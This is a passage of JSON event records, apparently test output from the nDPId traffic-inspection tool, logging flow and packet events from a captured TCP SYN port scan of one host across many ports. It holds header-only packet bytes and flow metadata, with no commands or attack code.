-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"synscan.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"synscan.pcap","alias":"nDPId-test","flow_id":714,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsRaYAACsG18ysEAAIQA2GNIzSBDvdUoMYAAAAAGACEAAkVAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"synscan.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"synscan.pcap","alias":"nDPId-test","flow_id":715,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsiPMAACwGk3+sEAAIQA2GNIzSIf3dUoMYAAAAAGACBAASkgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAs+0YAADcGFiysEAAIQA2GNIzSDT7dUoMYAAAAAGACEAAbUQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"synscan.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"synscan.pcap","alias":"nDPId-test","flow_id":717,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/f0AAC8GG3WsEAAIQA2GNIzSB1PdUoMYAAAAAGACEAAhPAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":727,"source":"synscan.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"synscan.pcap","alias":"nDPId-test","flow_id":718,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAstrAAADgGWcKsEAAIQA2GNIzSBK\/dUoMYAAAAAGACBAAv4AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAs+94AACwGIJSsEAAIQA2GNIzSBrndUoMYAAAAAGACBAAt1gAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":729,"source":"synscan.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":729,"source":"synscan.pcap","alias":"nDPId-test","flow_id":720,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAskckAADoGfKmsEAAIQA2GNIzSKhrdUoMYAAAAAGACDAACdQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"synscan.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"synscan.pcap","alias":"nDPId-test","flow_id":721,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsvA8AAC4GXmOsEAAIQA2GNIzSBrbdUoMYAAAAAGACDAAl2QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"synscan.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"synscan.pcap","alias":"nDPId-test","flow_id":722,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAso3UAADQGcP2sEAAIQA2GNIzSPoDdUoMYAAAAAGACBAD2DgAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":732,"source":"synscan.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"synscan.pcap","alias":"nDPId-test","flow_id":723,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsdjYAADgGmjysEAAIQA2GNIzSAH3dUoMYAAAAAGACBAA0EgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"synscan.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1658,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"synscan.pcap","alias":"nDPId-test","flow_id":724,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAstNUAACgGa52sEAAIQA2GNIzSBnrdUoMYAAAAAGACBAAuFQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"synscan.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1148,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"synscan.pcap","alias":"nDPId-test","flow_id":725,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAs8U8AACUGMiOsEAAIQA2GNIzSBHzdUoMYAAAAAGACCAAsEwAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":735,"source":"synscan.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"synscan.pcap","alias":"nDPId-test","flow_id":726,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsbZEAACkGseGsEAAIQA2GNIzSAW7dUoMYAAAAAGACCAAvIQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"synscan.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"synscan.pcap","alias":"nDPId-test","flow_id":727,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAszmgAADIGSAqsEAAIQA2GNIzSwA3dUoMYAAAAAGACDABsgQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"synscan.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"synscan.pcap","alias":"nDPId-test","flow_id":728,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAsxpgAADcGStqsEAAIQA2GNIzSBy\/dUoMYAAAAAGACEAAhYAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"synscan.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9943,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"synscan.pcap","alias":"nDPId-test","flow_id":729,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAsSxQAADkGxF6sEAAIQA2GNIzSJtfdUoMYAAAAAGACCAAJuAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"synscan.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"synscan.pcap","alias":"nDPId-test","flow_id":730,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAst8gAADoGVqqsEAAIQA2GNIzSCDvdUoMYAAAAAGACDAAkVAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"synscan.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"synscan.pcap","alias":"nDPId-test","flow_id":731,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAsZw4AADEGsGSsEAAIQA2GNIzSKXndUoMYAAAAAGACCAAHFgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"synscan.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"synscan.pcap","alias":"nDPId-test","flow_id":732,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs2AwAACgGSGasEAAIQA2GNIzSCp3dUoMYAAAAAGACBAAp8gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"synscan.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"synscan.pcap","alias":"nDPId-test","flow_id":733,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAsRBEAAC0G12GsEAAIQA2GNIzSJxPdUoMYAAAAAGACCAAJfAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"synscan.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"synscan.pcap","alias":"nDPId-test","flow_id":734,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs8C8AADUGI0OsEAAIQA2GNIzSBBHdUoMYAAAAAGACCAAsfgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"synscan.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"synscan.pcap","alias":"nDPId-test","flow_id":735,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAsHTEAACwG\/0GsEAAIQA2GNIzSBBLdUoMYAAAAAGACBAAwfQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"synscan.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"synscan.pcap","alias":"nDPId-test","flow_id":736,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAsK1MAADIG6x+sEAAIQA2GNIzSH5LdUoMYAAAAAGACDAAM\/QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":746,"source":"synscan.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"synscan.pcap","alias":"nDPId-test","flow_id":737,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAsd90AADEGn5WsEAAIQA2GNIzSBI3dUoMYAAAAAGACCAAsAgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":747,"source":"synscan.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 